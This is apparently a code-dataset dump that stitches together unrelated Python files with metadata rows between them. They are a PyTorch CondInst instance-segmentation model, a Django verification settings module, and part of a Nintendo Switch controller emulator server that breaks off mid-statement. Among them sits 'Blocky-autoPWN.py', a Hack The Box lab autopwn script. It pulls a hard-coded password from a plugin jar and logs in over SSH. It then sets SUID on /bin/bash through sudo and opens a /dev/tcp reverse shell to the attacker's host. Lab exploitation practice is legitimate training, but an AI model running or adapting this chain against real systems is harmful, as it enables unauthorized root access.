    return heatmap, centroids
def get_heatmap_peaks(cls_logits, topk, kernel=3):
    """
    Extract the top-k local maxima from per-class heatmap logits.

    Params:
        cls_logits: Tensor[num_batch, num_classes, height, width]
        topk: number of peaks to keep per batch element
        kernel: size of the local-maximum window
    Returns:
        labels: Tensor[num_batch, topk] class index of each peak
        cls_preds: Tensor[num_batch, topk] peak scores (sigmoid)
        points: Tensor[num_batch, topk, (x, y)] peak coordinates
    """
    num_batch, num_classes, height, width = cls_logits.shape
    scores = cls_logits.sigmoid()
    # Keep only cells that equal their local max (non-maximum suppression).
    pad = (kernel - 1) // 2
    local_max = F.max_pool2d(scores, (kernel, kernel), stride=1, padding=pad)
    peaks = (local_max == scores).to(dtype=scores.dtype) * scores
    flat = peaks.view(num_batch, -1)  # [num_batch, num_classes*height*width]
    # Decompose the flat indices of the strongest peaks into class / y / x.
    # NOTE: TensorRT7 does not support rounding_mode='floor' for torch.div,
    # hence the plain div followed by long() truncation.
    cls_preds, keep = torch.topk(flat, k=topk, dim=1)
    labels = torch.div(keep, height * width).long()
    cell = torch.remainder(keep, height * width).long()
    ys = torch.div(cell, width).long()
    xs = torch.remainder(cell, width).long()
    points = torch.stack([xs, ys], dim=2)  # [num_batch, topk, (x, y)]
    return labels, cls_preds, points
class CondInst(nn.Module):
    """CondInst-style instance segmentation network.

    A ResNet-50 backbone feeds a small FPN.  Three heads predict, per
    feature-map location: class heatmaps (cls_head), dynamic per-instance
    convolution parameters (ctr_head), and a shared mask feature map
    (mask_head).  At inference, the dynamic parameters sampled at heatmap
    peaks become the weights/biases of a tiny 3-layer conv net (emulated
    with matmuls) that paints each instance's mask.
    """

    def __init__(self, mode, input_channels, num_classes, topk):
        """
        Params:
            mode: 'training' (forward returns raw logits) or 'inference'
                (forward returns decoded labels/scores/masks)
            input_channels: number of image channels; the backbone's first
                conv is widened when != 3
            num_classes: number of object classes
            topk: maximum number of instances decoded at inference
        """
        super().__init__()
        assert mode in ['training', 'inference']
        self.mode = mode
        self.topk = topk
        self.num_filters = 8
        # Channel offsets into ctr_head's output.  The dynamic mask head is:
        # conv1: (num_filters+2) -> num_filters, conv2: num_filters -> num_filters,
        # conv3: num_filters -> 1.  Weights are laid out first, then biases.
        self.conv1_w = (self.num_filters + 2) * self.num_filters
        self.conv2_w = self.conv1_w + self.num_filters * self.num_filters
        self.conv3_w = self.conv2_w + self.num_filters * 1
        self.conv1_b = self.conv3_w + self.num_filters
        self.conv2_b = self.conv1_b + self.num_filters
        self.conv3_b = self.conv2_b + 1
        num_channels = self.conv3_b
        # self.backbone = resnet_fpn_backbone('resnet50', pretrained=True, trainable_layers=0)
        # self.backbone = resnet_fpn_backbone('resnet34', pretrained=True, trainable_layers=5)
        self.backbone = torchvision.models.resnet50(pretrained=True)
        # 1x1 lateral convs project each backbone stage to 256 channels for the FPN.
        self.lateral_conv2 = nn.Sequential(
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=1, padding=0, bias=False),
            nn.BatchNorm2d(num_features=256)
        )
        self.lateral_conv3 = nn.Sequential(
            nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, padding=0, bias=False),
            nn.BatchNorm2d(num_features=256)
        )
        self.lateral_conv4 = nn.Sequential(
            nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=1, padding=0, bias=False),
            nn.BatchNorm2d(num_features=256)
        )
        self.lateral_conv5 = nn.Sequential(
            nn.Conv2d(in_channels=2048, out_channels=256, kernel_size=1, padding=0, bias=False),
            nn.BatchNorm2d(num_features=256)
        )
        # Class-heatmap head: 4x (conv-BN-ReLU) then 1x1 conv to num_classes.
        self.cls_head = nn.Sequential(
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=num_classes, kernel_size=1, padding=0)
        )
        # Controller head: predicts the dynamic conv weights/biases per location.
        self.ctr_head = nn.Sequential(
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=256),
            nn.ReLU(),
            nn.Conv2d(in_channels=256, out_channels=num_channels, kernel_size=1, padding=0)
        )
        # Mask-feature head: shared features consumed by every instance's dynamic net.
        self.mask_head = nn.Sequential(
            nn.Conv2d(in_channels=256, out_channels=128, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=128),
            nn.ReLU(),
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=128),
            nn.ReLU(),
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=128),
            nn.ReLU(),
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(num_features=128),
            nn.ReLU(),
            nn.Conv2d(in_channels=128, out_channels=self.num_filters, kernel_size=1, padding=0)
        )
        # Initialize
        def initialize(m):
            if isinstance(m, nn.Conv2d):
                nn.init.normal_(m.weight, std=0.01)
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.ConvTranspose2d):
                nn.init.normal_(m.weight, std=0.01)
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
        self.lateral_conv2.apply(initialize)
        self.lateral_conv3.apply(initialize)
        self.lateral_conv4.apply(initialize)
        self.lateral_conv5.apply(initialize)
        self.cls_head.apply(initialize)
        self.ctr_head.apply(initialize)
        self.mask_head.apply(initialize)
        # Initialize last layer of class head
        # NOTE: see Focal Loss paper for detail https://arxiv.org/abs/1708.02002
        pi = 0.01
        bias = -math.log((1 - pi) / pi)
        nn.init.constant_(self.cls_head[-1].bias, bias)
        # Change number of input channels: widen conv1, keeping the pretrained
        # RGB weights in the first three input channels.
        if input_channels != 3:
            output_channels, _, h, w = self.backbone.conv1.weight.shape
            weight = torch.zeros(output_channels, input_channels, h, w)
            nn.init.normal_(weight, std=0.01)
            weight[:, :3, :, :] = self.backbone.conv1.weight
            self.backbone.conv1.weight = nn.Parameter(weight, requires_grad=True)
            # self.backbone.conv1.apply(initialize)

    def forward(self, images):
        """Run the network.

        Params:
            images: Tensor[num_batch, input_channels, image_height, image_width]
        Returns:
            training mode: (cls_logits, ctr_logits, mask_logits) raw head outputs
            inference mode: (labels int, scores float, masks float) for the
                top-k decoded instances per image
        """
        # Convert input images to FP32 or FP16 depending on backbone dtype
        images = images.to(dtype=self.backbone.conv1.weight.dtype)
        # Backbone
        x = self.backbone.conv1(images)
        x = self.backbone.bn1(x)
        x = self.backbone.relu(x)
        x = self.backbone.maxpool(x)
        c2 = self.backbone.layer1(x)   # 1/4
        c3 = self.backbone.layer2(c2)  # 1/8
        c4 = self.backbone.layer3(c3)  # 1/16
        c5 = self.backbone.layer4(c4)  # 1/32
        # FPN: top-down pathway with lateral connections.
        p5 = self.lateral_conv5(c5)
        p4 = self.lateral_conv4(c4) + F.interpolate(p5, scale_factor=2, mode='bilinear', align_corners=False)
        p3 = self.lateral_conv3(c3) + F.interpolate(p4, scale_factor=2, mode='bilinear', align_corners=False)
        p2 = self.lateral_conv2(c2) + F.interpolate(p3, scale_factor=2, mode='bilinear', align_corners=False)
        # Classification/controller heads run on p3; mask head on the finer p2.
        x = p3
        cls_logits = self.cls_head(x)  # [num_batch, num_classes, feature_height, feature_width]
        ctr_logits = self.ctr_head(x)  # [num_batch, num_channels, feature_height, feature_width]
        x = p2
        mask_logits = self.mask_head(x)  # [num_batch, num_filters, mask_height, mask_width]
        if self.mode == 'training':
            return cls_logits, ctr_logits, mask_logits
        else:
            labels, scores, points = get_heatmap_peaks(cls_logits, topk=self.topk)
            num_batch, num_objects, _ = points.shape
            masks = []
            for i in range(num_batch):
                mask = self.generate_mask(ctr_logits[i], mask_logits[i], points[i])
                masks.append(mask)
            masks = torch.stack(masks, dim=0)
            return labels.int(), scores.float(), masks.float()

    def generate_mask(self, ctr_logits, mask_logits, centroids):
        """Paint one mask per instance using dynamic conv parameters.

        The 3-layer dynamic conv net is emulated with batched matmuls so the
        graph stays TensorRT7-compatible (see NOTEs below).

        Params:
            ctr_logits: Tensor[num_channels, feature_height, feature_width]
            mask_logits: Tensor[num_filters, mask_height, mask_width]
            centroids: Tensor[num_objects, (x, y)] -- feature-map coordinates
        Returns:
            masks: Tensor[num_objects, mask_height, mask_width] -- sigmoid probabilities
        """
        _, feature_height, feature_width = ctr_logits.shape
        _, mask_height, mask_width = mask_logits.shape
        num_objects, _ = centroids.shape
        dtype = ctr_logits.dtype
        device = ctr_logits.device
        # Absolute coordinates
        # NOTE: TensorRT7 does not support float range operation. Use cast instead.
        location_x = torch.arange(0, mask_width, 1, dtype=torch.int32, device=device)   # Tensor[mask_width]
        location_y = torch.arange(0, mask_height, 1, dtype=torch.int32, device=device)  # Tensor[mask_height]
        location_x = location_x.to(dtype)
        location_y = location_y.to(dtype)
        location_y, location_x = torch.meshgrid(location_y, location_x)  # Tensor[mask_height, mask_width], Tensor[mask_height, mask_width]
        location_xs = location_x[None,:,:].repeat(num_objects, 1, 1)  # Tensor[num_objects, mask_height, mask_width]
        location_ys = location_y[None,:,:].repeat(num_objects, 1, 1)  # Tensor[num_objects, mask_height, mask_width]
        # Relative coordinates: shift origin to each instance centroid, scaled
        # from feature-map to mask-map resolution.
        location_xs -= centroids[:, 0].view(-1, 1, 1) * (mask_width // feature_width)    # Tensor[num_objects, mask_height, mask_width]
        location_ys -= centroids[:, 1].view(-1, 1, 1) * (mask_height // feature_height)  # Tensor[num_objects, mask_height, mask_width]
        # location_xs /= mask_width
        # location_ys /= mask_height
        # Add relative coordinates to mask features
        mask_logits = mask_logits[None,:,:,:].expand(num_objects, self.num_filters, mask_height, mask_width)  # Tensor[num_objects, num_filters, mask_height, mask_width]
        mask_logits = torch.cat([mask_logits, location_xs[:,None,:,:], location_ys[:,None,:,:]], dim=1)  # Tensor[num_objects, num_filters+2, mask_height, mask_width]
        # Create instance-aware mask head: slice the dynamic weights/biases for
        # each instance out of the controller output at its centroid.
        px = centroids[:,0]  # Tensor[num_objects]
        py = centroids[:,1]  # Tensor[num_objects]
        weights1 = ctr_logits[:self.conv1_w, py, px].view(self.num_filters, self.num_filters+2, num_objects, 1)
        weights2 = ctr_logits[self.conv1_w:self.conv2_w, py, px].view(self.num_filters, self.num_filters, num_objects, 1)
        weights3 = ctr_logits[self.conv2_w:self.conv3_w, py, px].view(1, self.num_filters, num_objects, 1)
        biases1 = ctr_logits[self.conv3_w:self.conv1_b, py, px]
        biases2 = ctr_logits[self.conv1_b:self.conv2_b, py, px]
        biases3 = ctr_logits[self.conv2_b:self.conv3_b, py, px]
        # Apply mask head to mask features with relative coordinates
        # NOTE: TensorRT7 does not support dynamic filter for conv2d. Use matmul instead.
        # NOTE: matmul is used in the following way: [N, H*W, 1, C1] * [N, 1, C1, C2] = [N, H*W, 1, C2]
        x = mask_logits.view(num_objects, self.num_filters+2, -1, 1)  # Tensor[num_objects, num_filters+2, mask_height*mask_width, 1]
        x = x.permute(0, 2, 3, 1)  # Tensor[num_objects, mask_height*mask_width, 1, num_filters+2]
        weights1 = weights1.permute(2, 3, 1, 0)  # Tensor[num_objects, 1, num_filters+2, num_filters]
        x = torch.matmul(x, weights1)  # Tensor[num_objects, mask_height*mask_width, 1, num_filters]
        biases1 = biases1[:, None, None, :].permute(3, 1, 2, 0)  # Tensor[num_object, 1, 1, num_filters]
        x = x + biases1
        x = F.relu(x)
        weights2 = weights2.permute(2, 3, 1, 0)  # Tensor[num_objects, 1, num_filters, num_filters]
        x = torch.matmul(x, weights2)  # Tensor[num_objects, mask_height*mask_width, 1, num_filters]
        biases2 = biases2[:, None, None, :].permute(3, 1, 2, 0)  # Tensor[num_object, 1, 1, num_filters]
        x = x + biases2
        x = F.relu(x)
        weights3 = weights3.permute(2, 3, 1, 0)  # Tensor[num_objects, 1, num_filters, 1]
        x = torch.matmul(x, weights3)  # Tensor[num_objects, mask_height*mask_width, 1, 1]
        biases3 = biases3[:, None, None, :].permute(3, 1, 2, 0)  # Tensor[num_objects, 1, 1, 1]
        x = x + biases3
        x = x.view(num_objects, mask_height, mask_width)  # Tensor[num_objects, mask_height, mask_width]
        masks = torch.sigmoid(x)
        return masks

    def loss(self, cls_logits, ctr_logits, mask_logits, targets):
        """Compute heatmap (focal) and mask (dice) losses.

        Params:
            cls_logits: Tensor[num_batch, num_classes, feature_height, feature_width]
            ctr_logits: Tensor[num_batch, num_channels, feature_height, feature_width]
            mask_logits: Tensor[num_batch, num_filters, mask_height, mask_width]
            targets: List[List[Dict{'class_labels': int, 'segmentation': Tensor[image_height, image_width]}]]
        Returns:
            heatmap_loss: Tensor[]
            mask_loss: Tensor[]
        """
        num_batch, num_classes, feature_height, feature_width = cls_logits.shape
        num_batch, num_filters, mask_height, mask_width = mask_logits.shape
        dtype = cls_logits.dtype
        device = cls_logits.device
        # Assign each GT mask to one point in feature map, then calculate loss
        heatmap_losses = []
        mask_losses = []
        for i in range(num_batch):
            num_objects = len(targets[i])
            # # Skip if no object in targets
            # if len(targets[i]) == 0:
            #     heatmap_losses.append(torch.tensor(0, dtype=dtype, device=device))
            #     mask_losses.append(torch.tensor(0, dtype=dtype, device=device))
            #     continue
            if num_objects > 0:
                # Convert list of dicts to Tensors
                gt_labels = torch.as_tensor([obj['class_labels'] for obj in targets[i]], dtype=torch.int64, device=device)  # Tensor[num_objects]
                gt_masks = torch.stack([torch.as_tensor(obj['segmentation'], dtype=dtype, device=device) for obj in targets[i]], dim=0)  # Tensor[num_objects, image_height, image_width]
                # Downsample GT masks
                gt_masks_size_feature = F.interpolate(gt_masks[None,...], size=(feature_height, feature_width))  # Tensor[1, num_objects, feature_height, feature_width]
                gt_masks_size_feature = gt_masks_size_feature[0,...]  # Tensor[num_objects, feature_height, feature_width]
                # Generate GT heatmap
                gt_heatmap, gt_centroids = generate_heatmap(gt_labels, gt_masks_size_feature, num_classes)  # Tensor[num_classes, feature_height, feature_width], Tensor[num_objects, (x, y)]
                # Generate mask for each object
                masks = self.generate_mask(ctr_logits[i], mask_logits[i], gt_centroids)  # Tensor[num_objects, mask_height, mask_width]
                # Calculate loss
                heatmap_loss = heatmap_focal_loss(cls_logits[i].sigmoid(), gt_heatmap, alpha=2, gamma=4) / num_objects
                gt_masks_size_mask = F.adaptive_avg_pool2d(gt_masks[None,...], output_size=(mask_height, mask_width))
                mask_loss = dice_loss(masks, gt_masks_size_mask)
            else:
                # No GT objects: only penalize the heatmap, mask loss is zero.
                gt_heatmap = torch.zeros_like(cls_logits[i])
                heatmap_loss = heatmap_focal_loss(cls_logits[i].sigmoid(), gt_heatmap, alpha=2, gamma=4)
                mask_loss = torch.tensor(0, dtype=dtype, device=device, requires_grad=True)
            heatmap_losses.append(heatmap_loss)
            mask_losses.append(mask_loss)
        heatmap_loss =torch.stack(heatmap_losses, dim=0).mean()
        mask_loss = torch.stack(mask_losses).mean()
        return heatmap_loss, mask_loss
| 48.431078 | 188 | 0.644328 |
3adcf1fe5d6dea4fb1870fe9017321b2ad54e8fe | 3,278 | py | Python | Blocky-autoPWN.py | z3rObyte/HackTheBox-Autopwn | 6477f43a0a845adee715ffe1bc4ade62aeb3e679 | [
"Apache-2.0"
] | 1 | 2021-08-25T14:01:13.000Z | 2021-08-25T14:01:13.000Z | Blocky-autoPWN.py | z3rObyte/HackTheBox-Autopwn | 6477f43a0a845adee715ffe1bc4ade62aeb3e679 | [
"Apache-2.0"
] | null | null | null | Blocky-autoPWN.py | z3rObyte/HackTheBox-Autopwn | 6477f43a0a845adee715ffe1bc4ade62aeb3e679 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import zipfile
from pwn import * # pip3 install pwn
banner = """
____ __ __ __ ____ _ ___ __
/ __ )/ /___ _____/ /____ __ ____ ___ __/ /_____ / __ \ | / / | / /
/ __ / / __ \/ ___/ //_/ / / /_____/ __ `/ / / / __/ __ \/ /_/ / | /| / / |/ /
/ /_/ / / /_/ / /__/ ,< / /_/ /_____/ /_/ / /_/ / /_/ /_/ / ____/| |/ |/ / /| /
/_____/_/\____/\___/_/|_|\__, / \__,_/\__,_/\__/\____/_/ |__/|__/_/ |_/
/____/
by z3r0byte <3
"""
# Ctrl+C handler: remove artefacts generated by the exploit, then exit.
def def_handler(sig, frame):
    print("\n[!] Saliendo...\n")
    os.system("rm -rf com/ META-INF/ *sh *zip")
    sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
# Global target URLs (Hack The Box "Blocky" machine, 10.10.10.37).
plugin_url = 'http://10.10.10.37/plugins/files/BlockyCore.jar'
blog_post_url = 'http://10.10.10.37/index.php/2017/07/02/welcome-to-blockycraft/'
# Main exploit chain: leak credentials from a Minecraft plugin, SSH in as
# the user, escalate via sudo, and catch a root reverse shell.
def main():
    # Show the banner
    print(banner)
    # Download the plugin jar from the web server
    p1 = log.progress("Extracción de credenciales")
    p1.status("Descargando plugin")
    time.sleep(2)
    plugin = requests.get(plugin_url)
    open('./plugin.zip', 'wb').write(plugin.content)
    # Unzip the plugin (a .jar is just a zip archive)
    p1.status("Descomprimiendo plugin")
    time.sleep(2)
    with zipfile.ZipFile("plugin.zip","r") as zip_file:
        zip_file.extractall("./")
    # Extract the hard-coded password from the plugin's class file
    # (line 11 of the `strings` output is the SQL password).
    p1.status("Buscando contraseña dentro del plugin")
    time.sleep(2)
    password = subprocess.check_output("strings com/myfirstplugin/BlockyCore.class | sed -n '11p'", shell=True, universal_newlines=True)
    # Scrape the username from the WordPress blog post author link
    p1.status("Extrayendo usuario")
    time.sleep(2)
    r = requests.get(blog_post_url)
    username = re.findall(r'author/notch/">(.*?)</a></span>', r.text)[0]
    p1.success()
    # Normalize credentials: strip whitespace/newlines, lowercase the username
    password = password.strip("\n")
    password = password.strip()
    username = username.lower()
    # Create helper scripts for privilege escalation
    os.system("echo \"#!/bin/bash \nchmod u+s /bin/bash\" > bash-SUID.sh")
    LHOST=str(input("Introduce tu LHOST tun0 -> "))
    LHOST = LHOST.strip("\n")
    os.system("echo \"#!/bin/bash \nbash -i >& /dev/tcp/"+LHOST+"/4444 0>&1\" > revshell.sh")
    # SSH in, upload the scripts, run them with sudo for privilege escalation
    def SSH():
        shell = ssh(username, '10.10.10.37', password=password, port=22)
        shell.upload(b"./bash-SUID.sh", remote="/tmp/bash-SUID.sh")
        shell.upload(b"./revshell.sh", remote="/tmp/revshell.sh")
        term = shell.run(b"bash")
        term.sendline("echo "+password+" | sudo -S bash /tmp/bash-SUID.sh")
        term.sendline("bash /tmp/revshell.sh")
    try:
        threading.Thread(target=SSH, args=()).start()
    except Exception as e:
        log.error(str(e))
    # Catch the reverse shell and drop into an interactive root session
    sh = listen(4444, timeout=120).wait_for_connection()
    if sh.sock is None:
        sys.exit(1)
    else:
        sh.sendline("bash -p")
        sh.interactive()
if __name__ == '__main__':
    main()
| 28.017094 | 136 | 0.566809 |
3add20f0867b88372260c1d964a87cf06a4f4b64 | 1,621 | py | Python | verification/conf.py | HosseinMohammadii/django-rest-verification | 0e0d4633f4420896fbfa0005f9df49eb4ed68f88 | [
"MIT"
] | 1 | 2020-10-23T08:20:59.000Z | 2020-10-23T08:20:59.000Z | verification/conf.py | HosseinMohammadii/django-rest-verification | 0e0d4633f4420896fbfa0005f9df49eb4ed68f88 | [
"MIT"
] | null | null | null | verification/conf.py | HosseinMohammadii/django-rest-verification | 0e0d4633f4420896fbfa0005f9df49eb4ed68f88 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.utils import timezone
from .base import default_config, numeric, lowercase_alphabetic, uppercase_alphabetic
# Merge library defaults with the project's settings.VERIFICATION dict
# (project keys win).
config = default_config
config.update(settings.VERIFICATION)
# Name of the model field that stores a generated verification code.
VERIFICATION_CODE_FIELD = 'verification_code'
VERIFICATIONS = config.get('VERIFICATIONS')
CODE_LENGTH = config.get('CODE_LENGTH')
LIFE_TIME_SECOND = config.get('LIFE_TIME_SECOND')
LIFE_TIME_MINUTE = config.get('LIFE_TIME_MINUTE')
LIFE_TIME_HOUR = config.get('LIFE_TIME_HOUR')
LIFE_TIME_DAY = config.get('LIFE_TIME_DAY')
LIFE_TIME_PENALTY_SECOND = config.get('LIFE_TIME_PENALTY_SECOND')
# Total validity window of a code (base lifetime plus grace penalty).
# NOTE(review): "CODE_LIEF_TIME" looks like a typo for "CODE_LIFE_TIME";
# renaming would break importers, so it is left as-is — confirm before changing.
CODE_LIEF_TIME = timezone.timedelta(
    seconds=LIFE_TIME_SECOND + LIFE_TIME_PENALTY_SECOND,
    minutes=LIFE_TIME_MINUTE,
    hours=LIFE_TIME_HOUR,
    days=LIFE_TIME_DAY,
)
# Alphabet used for code generation, assembled from the configured flags.
ALLOWED_CODE_LETTERS = ''
if config.get('CONTAINS_NUMERIC'):
    ALLOWED_CODE_LETTERS += numeric
if config.get('CONTAINS_UPPER_ALPHABETIC'):
    ALLOWED_CODE_LETTERS += uppercase_alphabetic
if config.get('CONTAINS_LOWER_ALPHABETIC'):
    ALLOWED_CODE_LETTERS += lowercase_alphabetic
if len(ALLOWED_CODE_LETTERS) == 0:
    raise Exception("No letters are allowed for code generation")
# Index the configured verifications by type for O(1) lookup, and keep
# flat lists of the types and their user-model fields.
VERIFICATIONS_DICT = {}
VERIFICATIONS_TYPES = []
VERIFICATIONS_USER_MODEL_FIELDS = []
for verification in VERIFICATIONS:
    VERIFICATIONS_TYPES.append(verification.get('type'))
    VERIFICATIONS_USER_MODEL_FIELDS.append(verification.get('user_model_field'))
    VERIFICATIONS_DICT[verification.get('type')] = verification
def get_user_model_field(verification_type):
    """Return the user-model field name configured for *verification_type*.

    Returns None for unknown types.  The original chained ``.get`` on a
    possible ``None`` (``VERIFICATIONS_DICT.get(vt, None).get(...)``), which
    raised AttributeError for any unconfigured type despite the explicit
    None default signalling graceful-miss intent.
    """
    entry = VERIFICATIONS_DICT.get(verification_type)
    return entry.get('user_model_field') if entry is not None else None
| 33.770833 | 85 | 0.805676 |
3adedc706a3e7e55655cf8dce7e7f4c1476ebd61 | 13,078 | py | Python | nxbt/controller/server.py | Yamakaky/nxbt | 0fe9acaaf0fac8014f9aaee53943711a106b572c | [
"MIT"
] | null | null | null | nxbt/controller/server.py | Yamakaky/nxbt | 0fe9acaaf0fac8014f9aaee53943711a106b572c | [
"MIT"
] | null | null | null | nxbt/controller/server.py | Yamakaky/nxbt | 0fe9acaaf0fac8014f9aaee53943711a106b572c | [
"MIT"
] | null | null | null | import socket
import fcntl
import os
import time
import queue
import logging
import traceback
from .controller import Controller, ControllerTypes
from ..bluez import BlueZ
from .protocol import ControllerProtocol
from .input import InputParser
from .utils import format_msg_controller, format_msg_switch
class ControllerServer():
    """Emulates a Nintendo Switch controller over Bluetooth HID.

    Pairs (or re-pairs) with a Switch via two L2CAP sockets (control PSM 17,
    interrupt PSM 19) and then runs a fixed-frequency report loop, feeding
    macro/direct input from ``task_queue``/``state`` into the controller
    protocol.
    """

    def __init__(self, controller_type, adapter_path="/org/bluez/hci0",
                 state=None, task_queue=None, lock=None, colour_body=None,
                 colour_buttons=None):
        """
        :param controller_type: one of ControllerTypes (Pro Controller / Joy-Con L/R)
        :param adapter_path: DBus path of the Bluetooth adapter
        :param state: shared dict for status/errors/direct input (a local one
            is created when omitted)
        :param task_queue: queue of macro/stop/clear messages, optional
        :param lock: shared lock serializing adapter setup across controllers
        :param colour_body: controller body colour, optional
        :param colour_buttons: controller button colour, optional
        """
        self.logger = logging.getLogger('nxbt')
        # Cache logging level to increase performance on checks
        self.logger_level = self.logger.level
        if state:
            self.state = state
        else:
            self.state = {
                "state": "",
                "finished_macros": [],
                "errors": None,
                "direct_input": None
            }
        self.task_queue = task_queue
        self.controller_type = controller_type
        self.colour_body = colour_body
        self.colour_buttons = colour_buttons
        # NOTE(review): self.lock is only bound when a lock is provided, but
        # later code does "if self.lock:" unconditionally — without a lock
        # that would raise AttributeError. Confirm callers always pass one.
        if lock:
            self.lock = lock
        self.reconnect_counter = 0
        # Initializing Bluetooth
        self.bt = BlueZ(adapter_path=adapter_path)
        self.controller = Controller(self.bt, self.controller_type)
        self.protocol = ControllerProtocol(
            self.controller_type,
            self.bt.address,
            colour_body=self.colour_body,
            colour_buttons=self.colour_buttons)
        self.input = InputParser(self.protocol)
        self.slow_input_frequency = False

    def run(self, reconnect_address=None):
        """Runs the mainloop of the controller server.

        :param reconnect_address: The Bluetooth MAC address of a
        previously connected to Nintendo Switch, defaults to None
        :type reconnect_address: string or list, optional
        :returns: the shared state dict (state set to "crashed" with a
            traceback in "errors" on failure)
        """
        self.state["state"] = "initializing"
        try:
            # If we have a lock, prevent other controllers
            # from initializing at the same time and saturating the DBus,
            # potentially causing a kernel panic.
            if self.lock:
                self.lock.acquire()
            try:
                self.controller.setup()
                if reconnect_address:
                    itr, ctrl = self.reconnect(reconnect_address)
                else:
                    itr, ctrl = self.connect()
            finally:
                if self.lock:
                    self.lock.release()
            self.switch_address = itr.getsockname()[0]
            self.state["state"] = "connected"
            self.mainloop(itr, ctrl)
        except KeyboardInterrupt:
            pass
        except Exception:
            self.state["state"] = "crashed"
            self.state["errors"] = traceback.format_exc()
        return self.state

    def mainloop(self, itr, ctrl):
        """Fixed-frequency report loop: read Switch replies, apply queued
        macros and direct input, and send the next input report."""
        # Mainloop
        while True:
            # Start timing the command processing
            timer_start = time.perf_counter()
            # Attempt to get output from Switch
            try:
                reply = itr.recv(50)
                if self.logger_level <= logging.DEBUG and len(reply) > 40:
                    self.logger.debug(format_msg_switch(reply))
            except BlockingIOError:
                reply = None
            # Getting any inputs from the task queue
            if self.task_queue:
                try:
                    while True:
                        msg = self.task_queue.get_nowait()
                        if msg and msg["type"] == "macro":
                            self.input.buffer_macro(
                                msg["macro"], msg["macro_id"])
                        elif msg and msg["type"] == "stop":
                            self.input.stop_macro(
                                msg["macro_id"], state=self.state)
                        elif msg and msg["type"] == "clear":
                            self.input.clear_macros()
                except queue.Empty:
                    pass
            # Set Direct Input
            if self.state["direct_input"]:
                self.input.set_controller_input(self.state["direct_input"])
            self.protocol.process_commands(reply)
            self.input.set_protocol_input(state=self.state)
            msg = self.protocol.get_report()
            if self.logger_level <= logging.DEBUG and reply and len(reply) > 45:
                self.logger.debug(format_msg_controller(msg))
            try:
                itr.sendall(msg)
            except BlockingIOError:
                continue
            except OSError as e:
                # Attempt to reconnect to the Switch
                itr, ctrl = self.save_connection(e)
            # Figure out how long it took to process commands
            timer_end = time.perf_counter()
            elapsed_time = (timer_end - timer_start)
            if self.slow_input_frequency:
                # Check if we can switch out of slow frequency input
                if self.input.exited_grip_order_menu:
                    self.slow_input_frequency = False
                if elapsed_time < 1/15:
                    time.sleep(1/15 - elapsed_time)
            else:
                # Respond at 120Hz for Pro Controller
                # or 60Hz for Joy-Cons.
                # Sleep timers are compensated with the elapsed command
                # processing time.
                if self.controller_type == ControllerTypes.PRO_CONTROLLER:
                    if elapsed_time < 1/120:
                        time.sleep(1/120 - elapsed_time)
                else:
                    if elapsed_time < 1/60:
                        time.sleep(1/60 - elapsed_time)

    def save_connection(self, error, state=None):
        """Try to salvage a dropped connection.

        Attempts up to two reconnects to the previously-connected Switch;
        if those fail, falls back to advertising and pairing with any Switch.

        :param error: the OSError that triggered the recovery (logged)
        :param state: unused, kept for interface compatibility
        :returns: new (interrupt, control) sockets
        """
        while self.reconnect_counter < 2:
            try:
                self.logger.debug("Attempting to reconnect")
                # Reinitialize the protocol
                self.protocol = ControllerProtocol(
                    self.controller_type,
                    self.bt.address,
                    colour_body=self.colour_body,
                    colour_buttons=self.colour_buttons)
                if self.lock:
                    self.lock.acquire()
                try:
                    itr, ctrl = self.reconnect(self.switch_address)
                    return itr, ctrl
                finally:
                    if self.lock:
                        self.lock.release()
            except OSError:
                self.reconnect_counter += 1
                self.logger.exception(error)
                time.sleep(0.5)
        # If we can't reconnect, transition to attempting
        # to connect to any Switch.
        self.logger.debug("Connecting to any Switch")
        self.reconnect_counter = 0
        # Reinitialize the protocol
        self.protocol = ControllerProtocol(
            self.controller_type,
            self.bt.address,
            colour_body=self.colour_body,
            colour_buttons=self.colour_buttons)
        self.input.reassign_protocol(self.protocol)
        # Since we were forced to attempt a reconnection
        # we need to press the L/SL and R/SR buttons before
        # we can proceed with any input.
        if self.controller_type == ControllerTypes.PRO_CONTROLLER:
            self.input.current_macro_commands = "L R 0.0s".strip(" ").split(" ")
        elif self.controller_type == ControllerTypes.JOYCON_L:
            self.input.current_macro_commands = "JCL_SL JCL_SR 0.0s".strip(" ").split(" ")
        elif self.controller_type == ControllerTypes.JOYCON_R:
